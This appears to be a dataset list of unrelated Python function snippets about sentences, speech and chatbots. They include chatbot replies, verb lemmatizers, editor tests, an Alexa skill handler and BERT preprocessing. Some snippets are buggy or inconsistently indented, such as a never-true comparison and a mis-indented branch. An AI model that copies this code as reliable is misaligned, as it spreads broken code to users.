This will help extract the most relevant\n # response text even across multiple sentences (for example if there was no obvious direct noun\n # in one sentence\n pronoun, noun, adjective, verb = find_candidate_parts_of_speech(parsed)\n\n # If we said something about the bot and used some kind of direct noun, construct the\n # sentence around that, discarding the other candidates\n resp = check_for_comment_about_bot(pronoun, noun, adjective)\n\n # If we just greeted the bot, we'll use a return greeting\n if not resp:\n resp = check_for_greetings(parsed)\n if resp:\n resp = resp + \". Ssup ?\"\n\n if not resp:\n resp = check_for_signout(parsed)\n\n if not resp:\n # If we didn't override the final sentence, try to construct a new one:\n if not pronoun:\n resp = random.choice(NONE_RESPONSES)\n elif pronoun == 'I' and not verb:\n resp = random.choice(COMMENTS_ABOUT_SELF)\n else:\n resp = construct_response(pronoun, noun, verb)\n\n # If we got through all that with nothing, use a random response\n if not resp:\n resp = random.choice(NONE_RESPONSES)\n\n #logger.info(\"Returning phrase '%s'\", resp)\n pprint(\"RETURNING PHRASE\")\n pprint(resp)\n # Check that we're not going to say anything obviously offensive\n # filter_response(resp)\n\n return resp", "def sample_sentence(self, prefix=[], max_length=20):\r\n i = 0\r\n sent = prefix\r\n word = self.sample_next(sent, False)\r\n while i <= max_length and word != \"END_OF_SENTENCE\":\r\n sent.append(word)\r\n word = self.sample_next(sent)\r\n i += 1\r\n return sent", "def test_forward_sentence(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. 
StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"3.17\", \"3.17\"),\n after_sel=(\"3.142\", \"3.142\"),\n command_name=\"forward-sentence\",\n )", "def update_sentence(line):\n checker = audit_way.Similarity()\n return checker.check(line)", "def verb_lemma(word):\n if word.endswith(\"ed\"):\n if word[:-2].endswith(\"v\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"at\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"it\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"et\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ut\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ac\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"i\"):\n return word[:-3].lower() + \"y\"\n elif word[:-2].endswith(\"ir\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"ag\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"nc\"):\n return word[:-2].lower() + \"e\"\n elif word[:-2].endswith(\"nu\"):\n return word[:-2].lower() + \"e\"\n else:\n return word[:-2].lower() \n elif word.endswith(\"ing\"):\n if word[:-3].endswith(\"v\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"at\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"it\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"et\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ut\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ac\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"i\"):\n return word[:-4].lower() + \"y\"\n elif word[:-3].endswith(\"ir\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"ag\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"nc\"):\n return word[:-3].lower() + \"e\"\n elif word[:-3].endswith(\"nu\"):\n return word[:-3].lower() + \"e\"\n else:\n return word[:-3].lower()\n elif re.match(r\"(does|did|done)\", word):\n return (\"do\")\n elif re.match(r\"(is|are|am|was|will|were|been)\", word):\n return (\"be\")\n elif word == (\"'s\"):\n return (\"be\")\n elif re.match(r\"(had|has|'ve)\", word):\n return (\"have\")\n else:\n return word.lower()", "def sample_sentence_syl(hmm, obs_map, rhyme_dict, start_word, n_words=100):\n obs_map_r = obs_map_reverser(obs_map)\n\n num_start_word = obs_map[re.sub(r'[^-\\'\\w]', '', start_word).lower().strip('\\'')]\n num_rhyme_dict = {}\n\n # Convert the rhyme_dict to be composed of numbers instead of words.\n for _, (key, value) in enumerate(rhyme_dict.items()):\n num_value = []\n for val in value:\n # Clean up the word so we can see where it is in obs_map\n n_val = re.sub(r'[^-\\'\\w]', '', val).lower().strip('\\'')\n num_value.append(obs_map[n_val]) \n\n n_key = re.sub(r'[^-\\'\\w]', '', key).lower().strip('\\'')\n num_rhyme_dict[obs_map[n_key]] = num_value\n\n # Sample and convert sentence.\n # emission, states = hmm.generate_emission(n_words, num_rhyme_dict)\n emission, states = hmm.generate_emission(n_words, num_start_word)\n sentence = [obs_map_r[i] for i in emission]\n\n # Flip the order of the sentence before returning.\n # sentence.reverse() \n\n 
return sentence", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"<YOUR INTENT NAME HERE>\":\n # Update the wordsmith_data variable with your data. Use key, value\n # pairs where the key is the column name in Wordsmith and the value is\n # the value contained in that column\n wordsmith_data = { 'column1': 'value1', 'column2': 'value2' }\n narrative = wordsmith.generate(WORDSMITH_API_KEY, WORDSMITH_PROJECT_SLUG, WORDSMITH_TEMPLATE_SLUG, wordsmith_data)\n if 'errors' not in narrative:\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generated Response', narrative['data']['content'],\n '<REPROMPT TEXT HERE>', True))\n else:\n if not isinstance(narrative['errors'], list) :\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(narrative['errors']['detail']),\n '<REPROMPT TEXT HERE>', True))\n else:\n details = ', '.join([e['details'] for e in narrative['errors']])\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(details),\n '<REPROMPT TEXT HERE>', True))\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def generate_title(model, tokenizer, photo, max_length):\n in_text = \"startseq\"\n vocab = len(tokenizer.word_index) + 1\n prev_word = \"\"\n\n for i in range(max_length):\n sequence = tokenizer.texts_to_sequences([in_text])[0]\n sequence = pad_sequences([sequence], maxlen=max_length)\n yhat = model.predict([photo, sequence], verbose=0)\n yhat = random.choice(list(range(vocab)), 1, p=yhat[0])\n # yhat = argmax(yhat)\n word = word_for_id(yhat, tokenizer)\n\n if word is None:\n break\n\n if word == prev_word:\n pass\n\n in_text += \" \" + word\n\n prev_word = word\n\n if word == \"endseq\":\n break\n\n return in_text", "def onWordRecognised(self, *_args):\n # Unsubscribe to the event when talking,\n # to avoid repetitions\n memory.unsubscribeToEvent(\"WordRecognized\",\"AudioRecognition\")\n\n # We access to the word recognised in the memory\n word = memory.getData(\"WordRecognized\")\n\n # Debug : Print the word recognised\n print(\"Mot :\")\n print(word[0])\n print(\"Indice de confiance :\")\n print(word[1])\n print\n\n\n # We acknoledge a word if the trust is high enough\n if (word[1] > 0.28):\n self.mot = word[0]\n #self.tts.say(\"Le mot reconnu est :\"+self.mot)\n StateManager(self)\n \n\n # Subscribe again to the event\n memory.subscribeToEvent(\"WordRecognized\",\n \"AudioRecognition\",\n \"onWordRecognised\")", "def new_sentence():\n #Get the arguments from the get request\n seed = str(request.args.get(\"seed\"))\n message = str(request.args.get(\"message\"))\n try:\n size = int(request.args.get(\"n\"))\n except ValueError:\n size = len(seed)\n\n #Generate the markov model\n model = markov.make_model(message, size)\n\n #Return a json dictionary, containing the next seed and sentence\n return json.dumps({\"seed\":markov.random_seed(message, size), 
\"next_sentence\":markov.next_sentence(model, seed)})", "def parse_question(question):\n\tcontext = question['support']\n\tanswer = question['correct_answer']\n\ttarget = question['question']\n\n\tcontext_words = context.split(\" \")[0: 510]\n\ttarget_words = target.split(\" \")\n\n\tpunc_filter = str.maketrans('', '', string.punctuation)\n\n\tcontext_words = [word.translate(punc_filter) for word in context_words]\n\ttarget_words = [word.translate(punc_filter) for word in target_words]\n\tanswer_words = [word.translate(punc_filter) for word in answer.split(\" \")]\n\n\tbio_embeddings = [EMBEDER['O']]\n\tinside_answer = False\n\tanswer_index = 0\n\tcan_be_inside_answer = True\n\n\t# The following loop and above code does:\n\t# -Find where the answer is and place a B tag\n\t# -While still in the answer (the answer is more than one word) put an I tag\n\t# -Outside of the answer place a O tag\n\t# -Start and end with an O tag for BERT's automatic\n\t# -start token and end token representing the start and end of a sentence.\n\tfor word in context_words:\n\t\tif word.lower() == answer_words[0].lower() and can_be_inside_answer:\n\t\t\tbio_embeddings.append(EMBEDER[\"B\"])\n\t\t\tanswer_index += 1\n\t\t\tinside_answer = True\n\t\t\tcan_be_inside_answer = False\n\t\telif inside_answer:\n\t\t\tif len(answer_words) > 1:\n\t\t\t\tif word.lower() != answer_words[answer_index]:\n\t\t\t\t\tinside_answer = False\n\t\t\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\t\t\t\telse:\n\t\t\t\t\tbio_embeddings.append(EMBEDER[\"I\"])\n\t\t\telse:\n\t\t\t\tinside_answer = False\n\t\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\t\telse:\n\t\t\tbio_embeddings.append(EMBEDER[\"O\"])\n\tbio_embeddings.append(EMBEDER[\"O\"])\n\n\tground_truth = torch.tensor([BERT_TOKENIZER.encode(target_words)])\n\tcontext_words = torch.tensor([BERT_TOKENIZER.encode(context_words)])\n\n\tassert len(bio_embeddings) == len(context_words[0]), f'The BIO tags are not equal in length to the embeddings! 
' \\\n\t f'{None} & {len(bio_embeddings)} & {len(context_words[0])}'\n\treturn context_words, bio_embeddings, ground_truth", "def basicM(sentence):\n for word in Basic_Om:\n if sentence.lower() == word:\n return random.choice(Basic_AnsM)", "def print_sample(arg_pair: EviPair):\n print('Please think about which argument you '\n 'would prefer in a discussion about: '\n '\\'{}\\' '.format(arg_pair.topic))\n print('First evidence has stance {} : '.format(arg_pair.first_stance))\n print(arg_pair.first_evi)\n print('Second evidence has stance {} : '.format(arg_pair.second_stance))\n print(arg_pair.second_evi)\n print('Enter your choice: ')\n nn_prediction = predict_and_eval(arg_pair)\n print('Neuronal Network selected evidence {}'.format(nn_prediction))\n print('By an acceptance rate of {} sample was labeled as {} \\n'.\n format(arg_pair.acceptance_rate, arg_pair.label))", "def parse_example(txt):\n res = re.findall(r'\\\\example\\s*:\\s*(\\w+)', txt, re.DOTALL)\n if not res:\n return\n if len(res) > 1:\n print(\"warning: only zero or one examples authorized for each function\")\n return res[0]", "def apply(self, text):", "def counts_sentence(external, numbers):\n \n lof_count = 0\n mis_count = 0\n dnms = 0\n if len(external) > 0:\n dnms = external[\"dnms\"]\n lof_count = external[\"lof\"]\n mis_count = external[\"mis\"]\n \n if dnms == 1:\n if lof_count == 1:\n return \"This mutation was loss of function.\"\n elif mis_count == 1:\n return \"This mutation was missense/inframe.\"\n \n lof = \"were\"\n if len(external) > 0 and external[\"lof\"] == 1:\n lof = \"was\"\n \n mis = \"were\"\n if len(external) > 0 and external[\"mis\"] == 1:\n mis = \"was\"\n \n numbers_text = \"{} of these {} missense/inframe and {} {} loss of \" \\\n \"function.\".format(\\\n numbers.number_to_words(external[\"mis\"]).capitalize(), mis, \\\n numbers.number_to_words(external[\"lof\"]), lof)\n \n return numbers_text", "def test_get_whole_and_per_sentence_flair_sentiments():\n long_comments = [\"This was a really sucky movie. I will probably never go see this movie ever again. I am going to \"\n \"tell my whole family never to watch this movie. I very much enjoyed the special cameo in it \"\n \"though. 
I loved the plot line.\",\n\n \"it's intended to make the polling places dangerous by contaminating the air inside with virus \"\n \"that can linger for hours\",\n\n \"simple, just create an unmasked line in a separate part of the location let them infect each \"\n \"other\"]\n get_whole_and_per_sentence_flair_sentiments(long_comments)", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n 
self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "def introduction(state_object, nlg_object):\n # intents = [\"greet\", \"goodbye\", \"deny\", \"exclaim_neg\", \"clarification_request\", \"ask_if_ended\", \"feedback_prompt\"]\n if state_object.previous_intent == \"\":\n templates = nlg_object.first_templates\n return random.choice(templates[\"intro\"])\n else:\n if state_object.previous_intent == \"goodbye\" or state_object.previous_intent == \"deny\" \\\n or state_object.previous_intent == \"exclaim_neg\":\n templates = nlg_object.goodbye_templates\n return random.choice(templates[\"goodbye\"])\n else:\n templates = nlg_object.intro_templates\n return random.choice(templates[state_object.intent])", "async def say(self, ctx, *args):\n if not args:\n await ctx.send('did you want me to say something?')\n return\n message = ' '.join(args)\n message = profanity_filter(message)\n await ctx.send(message)", "def test_kill_sentence(self):\n before_b = \"\"\"\\\n This is the first sentence. This\n is the second sentence. And\n this is the last sentence.\n \"\"\"\n after_b = \"\"\"\\\n This is the first sentence. 
And\n this is the last sentence.\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"2.2\", \"2.2\"),\n after_sel=(\"1.27\", \"1.27\"),\n command_name=\"kill-sentence\",\n )", "def speech_callback(self, data):\n speech = data.data\n print \"RECEIVED SPEECH: \", speech\n if \"keyword detected\" in speech:\n if self.idling:\n self.control_pub.publish(\"ft go; idle stop; stt go\")\n self.behav_pub.publish(\"greet\")\n # self.behav_pub.publish(random.choice(categorized_behaviors['greeting']))\n elif \"play\" in speech:\n print \"STARTING GAME\"\n self.start_game = \"TTT\"\n elif \"bye\" in speech:\n self.control_pub.publish(\"idle go; stt go; stt_keyword go\")\n elif \"okay\" in speech:\n self.ok = True", "def __init__(self):\n self.sentence = []", "def add_sentence(self, sentence):\n for word in sentence.split(' '):\n self.add_word(word)", "def add_sentence(self, sentence):\n for word in sentence.split(' '):\n self.add_word(word)", "def convert_single_example(example, tokenizer, is_training, args):\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = [] # all subtokens of original doc after tokenizing\n features = []\n for (i, token) in enumerate(example['paragraph_tokens']):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = albert_tokenize(tokenizer, token)\n tok_to_orig_index.extend([i] * len(sub_tokens))\n all_doc_tokens.extend(sub_tokens)\n\n # 特别注意!由于在paragraph_tokens中我们的token已经映射过一次了\n # 这里wordpiece等于又映射了一遍,所以这里的操作是二次映射\n if example['position_map']:\n tok_to_orig_index = [example['position_map'][index] for index in tok_to_orig_index]\n\n # QUERY\n query_tokens = []\n query_tokens.append(\"[Q]\")\n query_tokens.extend(albert_tokenize(tokenizer, example['question_text']))\n if len(query_tokens) > args.max_query_length:\n query_tokens = query_tokens[-args.max_query_length:]\n\n # ANSWER 预处理的时候先长短分开\n tok_start_position = -1\n tok_end_position = -1\n # 这里终点是必然在para_tokens内的\n if is_training:\n # 现阶段,有短答案预测短答案,否则预测长答案\n if example['answer_type'] != AnswerType['UNKNOWN']:\n tok_long_start_position = orig_to_tok_index[example['long_start']]\n if example['long_end'] == len(orig_to_tok_index):\n tok_long_end_position = orig_to_tok_index[-1]\n else:\n tok_long_end_position = orig_to_tok_index[example['long_end']] - 1\n tok_start_position = tok_long_start_position\n tok_end_position = tok_long_end_position\n if example['answer_type'] == AnswerType['SHORT']:\n tok_short_start_position = orig_to_tok_index[example['short_start']]\n if example['short_end'] == len(orig_to_tok_index):\n tok_short_end_position = orig_to_tok_index[-1]\n else:\n tok_short_end_position = orig_to_tok_index[example['short_end']] - 1\n tok_start_position = tok_short_start_position\n tok_end_position = tok_short_end_position\n\n # Get max tokens number for original doc,\n # should minus query tokens number and 3 special tokens\n # The -3 accounts for [CLS], [SEP] and [SEP]\n max_tokens_for_doc = args.max_seq_length - len(query_tokens) - 3\n\n # We can have documents that are longer than the maximum sequence length.\n # To deal with this we do a sliding window approach, where we take chunks\n # of up to our max length with a stride of `doc_stride`.\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset # compute number of tokens remaining unsliding\n length = min(length, max_tokens_for_doc) # determine current sliding window 
size\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n\n # Consider case for reaching end of original doc\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, args.doc_stride)\n\n # Convert window + query + special tokens to feature\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n tokens = []\n token_to_orig_map = {}\n token_is_max_context = {}\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n tokens.extend(query_tokens)\n segment_ids.extend([0] * len(query_tokens))\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n is_max_context = check_is_max_context(doc_spans, doc_span_index, split_token_index)\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n assert len(tokens) == len(segment_ids)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (args.max_seq_length - len(input_ids))\n input_ids.extend(padding)\n input_mask.extend(padding)\n segment_ids.extend(padding)\n\n assert len(input_ids) == args.max_seq_length\n assert len(input_mask) == args.max_seq_length\n assert len(segment_ids) == args.max_seq_length\n\n start_position = None\n end_position = None\n answer_type = None\n answer_text = \"\"\n if is_training:\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n contains_an_annotation = (tok_start_position >= doc_start and tok_end_position <= doc_end)\n # 负样本需要经过采样,且目标为[CLS]\n if (not contains_an_annotation) or example['answer_type'] == AnswerType['UNKNOWN']:\n if args.include_unknowns < 0 or random.random() > args.include_unknowns:\n continue\n start_position = 0\n end_position = 0\n answer_type = AnswerType['UNKNOWN']\n else:\n doc_offset = len(query_tokens) + 2\n start_position = tok_start_position - doc_start + doc_offset\n end_position = tok_end_position - doc_start + doc_offset\n answer_type = example['answer_type']\n\n # 如果是短答案,对一下答案是否正确\n if example['answer_type'] == AnswerType['SHORT']:\n answer_text = \" \".join(tokens[start_position:(end_position + 1)])\n answer_text = answer_text.replace(' ', '').replace(u\"▁\", ' ').strip()\n gt_answer = example['short_answer_text'].lower()\n answer_text_chars = [c for c in answer_text if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n gt_answer_chars = [c for c in gt_answer if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n if \"\".join(answer_text_chars) != \"\".join(gt_answer_chars):\n print(answer_text, 'V.S.', gt_answer)\n\n feature = InputFeatures(\n unique_id=None,\n example_index=None,\n doc_span_index=doc_span_index,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n start_position=start_position,\n end_position=end_position,\n answer_text=answer_text,\n answer_type=answer_type)\n\n features.append(feature)\n\n return features", "def extract_sentence(tensor, delimiter=\"\"):\n pass", "def 
handle(text, mic, profile):\n if 'motion' not in profile or 'binary' not in profile['motion'] or 'runfile' not in profile['motion']:\n mic.say('Motion does not seem to be set-up correctly.')\n mic.say('Please add motion binary and motion runfile configuration options to you profile.')\n return\n runfile = profile['motion']['runfile']\n binary = profile['motion']['binary']\n responses = ['Hey, something is wrong. I am not supposed to say this.']\n if bool(re.search(r'\\bstop\\b', text, re.IGNORECASE)):\n if os.path.isfile(runfile):\n stopMotion(runfile)\n responses = ['Have it your way.', 'Enjoy your privacy.', 'I will just close my eyes for a second.', 'You are not that interesting anyway.']\n else:\n responses = ['I was not looking at you.', 'You are delusional, nobody is watching.', 'It was not me. It was the N S A.']\n elif bool(re.search(r'\\bstart\\b', text, re.IGNORECASE)):\n if os.path.isfile(runfile):\n responses = ['Did you think I was not paying attention?', 'I am already watching.', 'I have been on guard duty for a while already.']\n else:\n startMotion(binary)\n responses = ['I will keep an eye on things.', 'I will guard this room.', 'I will keep careful watch.', 'I will keep my eyes wide open.']\n mic.say(random.choice(responses))", "def final_result(self, hyp, confidence):\n msg = String()\n msg.data = str(hyp.lower())\n rospy.loginfo(\n 'Detected string: %s',\n msg.data\n )\n # Stop recogniser until started again by hotword/reasoning\n self.stop()\n self.pub.publish(msg)\n self.split_text_into_logic_parts(msg.data)", "def test_same_sentence_check(self):\n block = get_text(SAMPLE_SENTENCE)\n self.assertTrue(same_sentence_check(block, 0, 98))\n self.assertFalse(same_sentence_check(block, 166, 168))", "def func(self):\n\n caller = self.caller\n\n if not self.args:\n caller.msg(\"Say what?\")\n return\n\n speech = self.args\n\n # calling the speech hook on the location\n speech = caller.location.at_say(caller, speech)\n\n # Feedback for the object doing the talking.\n caller.msg('You say, \"%s|n\"' % speech)\n\n # Build the string to emit to neighbors.\n emit_string = '%s says, \"%s|n\"' % ( getNameAnsi( caller ), speech )\n caller.location.msg_contents(text=(emit_string, {\"type\": \"say\"}),\n exclude=caller, from_obj=caller)", "def example():\n\n exam = Exam('Exam Example')\n \n exam.add_question('What is the capital of California?', 'Sacramento')\n exam.add_question('What is the capital of Ohio?', 'Columbus')\n exam.add_question('What is the capital of Hawaii?', 'Honolulu')\n exam.add_question('What is the capital of New Mexico?', 'Santa Fe')\n\n student = Student('Sarah', 'Stringer', '7 Casa Way')\n\n score = take_test(exam, student)\n\n return score", "def life_sentence(x): \n if x == 'Life':\n return 1\n else:\n return 0", "def add_start_end_label(self, data, type=1):\n new_utts = []\n if type == 1:\n for line in data:\n title = [\"<s>\"] + line[0] + [\"</s>\"]\n context = [\"<s>\"] + line[1] + [\"</s>\"]\n target = [\"<s>\"] + line[2] + [\"</s>\"]\n new_utts.append([title, context, target])\n\n elif type == 2:\n for line in data:\n title = [\"<s>\"] + line[0] + [\"</s>\"]\n context = [\"<s>\"] + line[1] + [\"</s>\"]\n target = [\"<s>\"] + line[2] + [\"</s>\"]\n sentiment = line[3]\n new_utts.append([title, context, target, sentiment])\n\n elif type == 3:\n for line in data:\n new_utts.append([[\"<s>\"] + list(line) + [\"/s\"]])\n\n else:\n print(\"Invalid type in process function\")\n return\n\n return new_utts", "def sentences(a, b):\n\n # TODO\n return []", "def 
verb_stem(s):\n \n #If the stem is have, its 3s form is has.\n if s == \"has\" :\n return \"have\"\n\n #If the stem ends in y preceded by a vowel, simply add s (pays, buys).\n elif re.match(r\"[A-z]+[aeiou][y]s\\b\", s):\n str = s[:-1]\n\n #If the stem ends in y preceded by a non-vowel and contains at least three letters, change the y to ies (flies, tries, unifies).\n elif re.match(r\"[A-z]+[^aeiou]ies\\b\", s):\n str = s[:-3] + 'y'\n\n #If the stem is of the form Xie where X is a single letter other than a vowel, simply add s (dies, lies, ties note that this doesnt account for unties).\n elif re.match(r\"[^aeiou]ies\\b\", s):\n str = s[:-1]\n\n #If the stem ends in o,x,ch,sh,ss or zz, add es (goes, boxes, attaches, washes, dresses, fizzes).\n elif re.match(r\"[A-z]+([ox]|[cs]h|[s]s|[z]z)es\\b\", s): \n str = s[:-2]\n\n #If the stem ends in se or ze but not in sse or zze, add s (loses, dazes, lapses, analyses).\n elif re.match(r\"[A-z]+([s][^s][e]|[z][^z][e])s\\b\", s):\n str = s[:-1]\n\n #If the stem ends in e not preceded by i,o,s,x,z,ch,sh, just add s (likes, hates, bathes).\n elif re.match(r\"[A-z]+([^iosxz]|[^ch]|[^sh])es\\b\", s):\n str = s[:-1]\n \n #If the stem ends in anything except s,x,y,z,ch,sh or a vowel, add s (eats, tells, shows)\n elif re.match(r\"[A-z]+([^sxyzaeiou]|[^cs]h)s\\b\", s):\n str = s[:-1]\n\n else: \n str = \"\"\n\n\n matches = [(w, t) for (w, t) in vb_list if (w == s or w == str)]\n\n tag_s = [(w, t) for (w, t) in matches if w == s and t == 'VBZ']\n\n if tag_s == True:\n return str\n else:\n tag_str = [t for (w, t) in matches if w == str and t == 'VB']\n\n if not (tag_s or tag_str):\n str = \"\"\n\n return str", "async def saytext(self,ctx):\r\n if await bMsg(ctx,ctx.message.author.name,client):\r\n return\r\n logger.info('Games.saytext', extra={'invoker': ctx.message.author.name})\r\n await ctx.send(wordsDict.generate())", "def gen_Modal_Question(keyword_dic_sents):\n try:\n # txt = TextBlob(string)\n # for line in txt.sentences:\n for key in keyword_dic_sents.keys():\n \"\"\"\n outputs question from the given text\n \"\"\"\n # print(keyword_dic_sents[line])\n # print(entity.text, entity.label_)\n\n answers.append(key)\n # print(key)\n for sentence in keyword_dic_sents[key]:\n # print(sentence)\n if type(sentence) is str: # If the passed variable is of type string.\n line = TextBlob(sentence) # Create object of type textblob.blob.TextBlob\n # print(line)\n bucket = {} # Create an empty dictionary\n\n for i, j in enumerate(line.tags): # line.tags are the parts-of-speach in English\n if j[1] not in bucket:\n bucket[j[1]] = i # Add all tags to the dictionary or bucket variable\n\n question = '' # Create an empty string\n\n # With the use of conditional statements the dictionary is compared with the list created above\n # print(line.tags)\n #####################################################################gen modal 